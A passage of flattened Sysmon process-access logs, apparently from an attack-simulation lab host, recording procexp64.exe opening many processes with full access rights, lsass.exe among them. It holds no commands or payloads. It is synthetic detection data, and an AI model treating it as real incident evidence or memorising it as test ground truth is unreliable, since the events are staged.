Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792494Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:03.876{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792493Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:03.876{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792492Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:03.876{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792491Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:03.876{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792490Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:03.876{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792489Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:03.876{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792488Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:03.876{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792487Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:03.876{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792486Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:03.876{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792485Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:03.876{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792484Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:03.876{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792483Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:03.876{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792482Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:03.876{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792481Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:03.876{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792480Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:03.876{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792479Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:03.876{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792478Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:03.876{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792477Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:03.876{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792476Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:03.876{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792475Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:03.876{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792474Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:03.876{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792473Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:03.876{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792472Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:03.876{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792471Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:03.876{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792470Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:03.876{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1517-600B-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792469Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:03.876{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0200-00000000A301}448C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792468Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:03.876{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0100-00000000A301}4System0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792597Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:04.891{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3269-6010-E4A2-00000000A301}6804C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792596Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:04.891{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3269-6010-E3A2-00000000A301}2476C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792595Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:04.891{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3255-6010-D4A2-00000000A301}4024C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792594Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:04.891{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792593Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:04.891{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792592Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:04.891{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792591Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:04.891{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792590Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:04.891{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792589Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:04.891{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792588Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:04.891{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792587Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 